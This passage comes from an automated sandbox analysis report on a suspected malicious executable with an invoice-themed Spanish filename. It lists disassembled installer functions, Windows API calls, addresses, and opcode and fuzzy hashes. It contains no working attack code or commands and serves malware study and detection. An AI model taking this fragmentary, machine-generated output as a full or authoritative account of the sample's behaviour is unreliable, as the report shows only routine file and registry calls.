                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                • GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                • Opcode ID: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction ID: c1f6674fc9072460158ec6ac158274c55d6247b1d16a8c1a13e9c8cd3e3f7c83
                                • Opcode Fuzzy Hash: 2782f30abaae67d32aad9d2ddd7e042e6b9764b6a7ee77395c88dac23f9c836b
                                • Instruction Fuzzy Hash: 60F0C2715016612AC62033762E89A2B255C8E2136979B4F3FFD97F22D2CA3ECC31956D
                                Function 00405DF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                • GetLastError.KERNEL32 ref: 00405E0B
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1375471231-823278215
                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                Function 00406E83 Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                Function 6FA4167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A44
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A4A
                                  • Part of subcall function 6FA42351: GlobalFree.KERNEL32(?), ref: 6FA42A50
                                • GlobalFree.KERNEL32(00000000), ref: 6FA41738
                                • FreeLibrary.KERNEL32(?), ref: 6FA417C3
                                • GlobalFree.KERNEL32(00000000), ref: 6FA417E9
                                  • Part of subcall function 6FA41FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FA41FFA
                                  • Part of subcall function 6FA417F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FA41708,00000000), ref: 6FA4189A
                                  • Part of subcall function 6FA41F1E: wsprintfW.USER32 ref: 6FA41F51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc$Librarywsprintf
                                • String ID:
                                • API String ID: 3962662361-0
                                • Opcode ID: 7d10fe57d473f3fad9c7105ca2f88e2887ad66130f33ce5399e9f535f0bdcb45
                                • Instruction ID: 2b10a6fae63458f217ddec816cb7ec1950f428a7ecac03a4f636ff15286618eb
                                • Opcode Fuzzy Hash: 7d10fe57d473f3fad9c7105ca2f88e2887ad66130f33ce5399e9f535f0bdcb45
                                • Instruction Fuzzy Hash: 4541E735400348AFDB629F28D944BEA37F8BB41325F04401AFD5D8A1C2EB7DA5E9CA55
                                Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalFree.KERNEL32(006346B0), ref: 00401D81
                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00010432,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Global$AllocFreelstrcat
                                • String ID: Call
                                • API String ID: 238967769-1824292864
                                • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscDCA5.tmp,?,?,00000011,00000002), ref: 0040271D
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                Download Yara Rule
                                APIs
                                • MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                • Instruction ID: e1306000d3193007dcaf3fb318de5d2d5eb9708196255911654f78f844dcab6e
                                • Opcode Fuzzy Hash: 4a227ca3b38513ddfb18d8d58b55d7f5df30190cf1bb37be781ef323b2e94d58
                                • Instruction Fuzzy Hash: CB01D472B152309BD7296F2DEC09B2B2699A780711F55453EF901F72F1DBB89C02875C
                                Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CloseDeleteValue
                                • String ID:
                                • API String ID: 2831762973-0
                                • Opcode ID: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction ID: 38e38bfe0db84342a76dd61cbaa190e5b367477f23a550be25d98ac167cb56e2
                                • Opcode Fuzzy Hash: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction Fuzzy Hash: D5F02433645600A7E310ABA49D4AA7E765DAF903A2F11053FF642A61C4CE7E8C46862D
                                Function 004068F6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                Function 00402AF5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction ID: b4aa691efdd76b97e29f232bcdca97d183a91086d161f739a0adeab6622ebcbf
                                • Opcode Fuzzy Hash: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction Fuzzy Hash: F8E04F726452006FE610AB51ED8AD7FB71CEB81319F14483FF544A40C1C67E6855966A
                                Function 00406923 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction ID: 2742144f5a26ad2eb6f685a055c8babc8a1130b1cd91e66bb9562d29751e6569
                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction Fuzzy Hash: 7CE0BF72200119BB8F215B46DD04D9FBF6DEE956A47114026B905A6150D670EA11D6E4
                                Function 004069E6 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                • Instruction ID: 9dc68c0638fdc05cdedacbb3ce278f0548e4c11d63521e27f6831e75186a9fb8
                                • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                • Instruction Fuzzy Hash: 78E0BF32600159BB9F206F96DD04D9FFF6DEE927A47124026B905A2150D670EA11DBE4
